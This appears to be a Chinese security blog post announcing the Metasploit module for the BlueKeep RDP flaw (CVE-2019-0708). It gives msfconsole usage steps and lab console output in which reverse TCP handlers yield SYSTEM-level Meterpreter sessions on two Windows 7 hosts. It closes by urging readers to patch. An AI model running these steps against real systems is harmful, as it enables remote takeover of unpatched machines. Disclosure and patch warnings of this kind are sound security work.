它来了!它来了!MSF更新了CVE-2019-0708利用脚本,注意防护呀!

前言:

十个小时前,MSF更新了CVE-2019-0708漏洞利用模块,在Metasploit下使用,使用便捷。但根据官方显示,该模块仅针对64位的Win7系统和Windows Server 2008 R2,但对于Windows Server 2008 R2也有特定的条件,具体如下:

原文链接:

https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0

进入正题

该模块可以做哪些工作:

验证步骤:

开启msfconsole
use exploit/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS (设置目标主机,64位Win7系统或者 2008 R2)
set PAYLOAD 选择需要关联的参数
set TARGET 根据你的环境设置更具体的目标
验证你是否获取了一个shell
验证目标没有崩溃

输出:

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.101:3389 - Surfing channels ...
[*] 192.168.56.101:3389 - Lobbing eggs ...
[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500
[*] Session 1 created in the background.
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.105:3389 - Surfing channels ...
[*] 192.168.56.105:3389 - Lobbing eggs ...
[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500
[*] Session 2 created in the background.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)

结尾:

该漏洞,自出来以后,一直备受大家关注,现在更是出了漏洞利用脚本,有需要的朋友赶紧自查自己的系统,进行修复,避免对自己的系统造成不可估计的损失。

原文发布于微信公众号 - 小白帽学习之路(bat7089)

原文发表时间:2019-09-07

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券